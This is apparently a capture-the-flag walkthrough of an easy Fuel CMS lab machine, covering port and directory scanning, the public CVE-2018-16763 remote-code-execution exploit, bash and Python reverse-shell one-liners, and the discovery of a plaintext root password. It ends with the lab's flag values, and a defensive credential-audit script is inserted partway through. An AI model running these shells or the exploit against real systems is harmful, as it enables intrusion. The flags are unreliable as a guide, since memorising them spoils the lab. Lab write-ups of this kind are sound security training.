Description: A new start-up has a few issues with their web server.

Free room, Difficulty: Easy


>:sudo nmap -sC -sV 'machine-ip'

This is the scan method I use most of the time. With -sC nmap runs its default scripts and with -sV it shows the version of every service listening on the open ports. My results were:

Nmap scan result

The open port is 80 (HTTP). The website itself runs a content management system (CMS) named Fuel CMS.


To further enumerate the machine I want to scan it for any directories, including possibly hidden ones. For this I'm using GoBuster with the machine IP address and a wordlist of commonly used directory names:

>:gobuster dir -u http://'machine-ip' -w /usr/share/dirb/wordlists/common.txt

GoBuster scan result

A lot of directories! I went through all of them and one useful result was "/fuel", as we saw in the nikto scan result above; it turns out to be a login page.

Login page of fuelCMS

Because CMSs tend to have a lot of weak points, let's have a look on "exploit-db" whether there is an exploit for Fuel CMS.

Search result on exploit-db

The one result, CVE-2018-16763, is a remote code execution exploit against the CMS. I downloaded it and entered my own IP address, then marked it as executable and ran it. The output contained errors, mostly because of the proxy settings, so to make the exploit work I had to comment out the proxy entries. The exploit script should now look like this:

Entering the command whoami then got me the output www-data.

Command execution

Below that there are still some errors, but we got our desired output at the top.

Privilege Escalation

Because I am now able to execute commands, I entered the code for a reverse shell. To catch the connection we first have to set up a netcat listener:

>:nc -lnvp 443

Now we can enter our reverse shell code (bash or Python, whichever you like):

>:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 443 >/tmp/f
>:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And then stabilized my current shell with:

>:python -c 'import pty; pty.spawn("/bin/bash")'

Note: I found out that the su command used later on needs a terminal, so stabilizing the shell is essential to reach the solution.

Then I cat the "user.txt" file (*1) and searched for backups, because those tend to contain valuable information:

>:find / -type f -name "*.bak" 2>/dev/null

The 2>/dev/null at the end discards the error messages for the files and directories I don't have permission to read.

After looking around, I found the root password in /var/www/html/fuel/application/config/database.php.


root: mememe

So we have found the password for the root user and can now switch our account to root with the su command.
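Seen from the defender's side, the two weaknesses used above (readable backup files and a database password stored in plaintext in database.php that is also the root password) are easy to audit for. The following is an added example, not part of the original write-up: it walks a web root for backup and config files and extracts CodeIgniter-style `$db[...]` credentials (the format Fuel CMS's database.php uses; the file-name patterns and the sample tree are assumptions constructed here).

```python
import os
import re
import tempfile
from fnmatch import fnmatch

# Assumed list of file names worth reviewing on a web host: backups plus
# CodeIgniter-style database configs (Fuel CMS is built on CodeIgniter).
SENSITIVE_NAME_PATTERNS = ("*.bak", "*.old", "*.sql", "*.swp", "database.php", ".env")

# Matches lines such as  $db['default']['password'] = 'secret';
CRED_RE = re.compile(r"""\$db\[['"]\w+['"]\]\[['"](username|password)['"]\]\s*=\s*['"]([^'"]*)['"]""")


def find_sensitive_files(root):
    """Walk root and return paths whose basename matches a sensitive pattern.
    Unreadable directories are skipped, the explicit form of the 2>/dev/null above."""
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda e: None):
        for name in files:
            if any(fnmatch(name, p) for p in SENSITIVE_NAME_PATTERNS):
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)


def extract_db_credentials(text):
    """Return {'username': ..., 'password': ...} for the non-empty values found."""
    return {key: value for key, value in CRED_RE.findall(text) if value}


def audit(root):
    """Report every sensitive file and any plaintext DB credential inside it."""
    findings = []
    for path in find_sensitive_files(root):
        try:
            with open(path, errors="replace") as fh:
                creds = extract_db_credentials(fh.read())
        except OSError:
            continue  # permission denied etc.: skip it, as 2>/dev/null would
        findings.append({"path": os.path.relpath(path, root), "credentials": creds})
    return findings


def build_sample_tree():
    """Constructed web root mimicking the layout from the write-up (sample data only)."""
    root = tempfile.mkdtemp()
    cfg = os.path.join(root, "fuel", "application", "config")
    os.makedirs(cfg)
    with open(os.path.join(cfg, "database.php"), "w") as fh:
        fh.write("<?php\n$db['default']['username'] = 'root';\n"
                 "$db['default']['password'] = 'mememe';\n")
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello';\n")
    with open(os.path.join(root, "config.php.bak"), "w") as fh:
        fh.write("<?php // stale backup\n")
    return root
```

Run `audit(build_sample_tree())` to see the backup file and the database.php credentials reported; on a real host, point `audit` at the web root and treat every reported credential as one to rotate and to check for reuse against system accounts.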


After this you can just grab the root flag from /root.


1. User.txt
– 6470e394cbf6dab6a91682cc8585059b

2. Root.txt
– b9bbcb33e11b80be759c4e844862482d

Author : Puckiestyle
